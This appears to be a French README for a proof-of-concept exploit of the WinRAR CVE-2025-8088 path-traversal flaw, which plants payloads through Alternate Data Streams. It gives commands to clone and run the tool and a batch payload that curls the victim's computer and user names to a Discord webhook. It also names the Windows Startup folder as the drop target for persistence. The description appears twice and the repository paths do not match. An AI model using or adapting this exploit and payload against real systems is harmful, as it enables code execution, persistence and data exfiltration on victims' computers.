
Une preuve de concept d'exploit pour la vulnérabilité WinRAR (CVE-2025-8088) affectant les versions 7.12 et inférieures. Cet outil crée une archive RAR malveillante qui intègre des charges utiles dans des flux de données alternatifs (ADS) avec traversée de chemin, pouvant conduire à une exécution de code arbitraire.
Un exploit proof-of-concept pour la vulnérabilité WinRAR (CVE-2025-8088) affectant les versions 7.12 et inférieures. Cet outil crée une archive RAR malveillante qui intègre des payloads dans des Alternate Data Streams (ADS) avec un path traversal, pouvant mener à une exécution de code arbitraire.
# Clone the repository
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088
# Install dependencies
pip install reportlab
# Run the exploit
python CVE-2025-8088.py
Modifiez le payload pour appeler un webhook Discord :
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
Remplacez YOUR_DISCORD_WEBHOOK_URL par l'URL réelle de votre webhook.
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\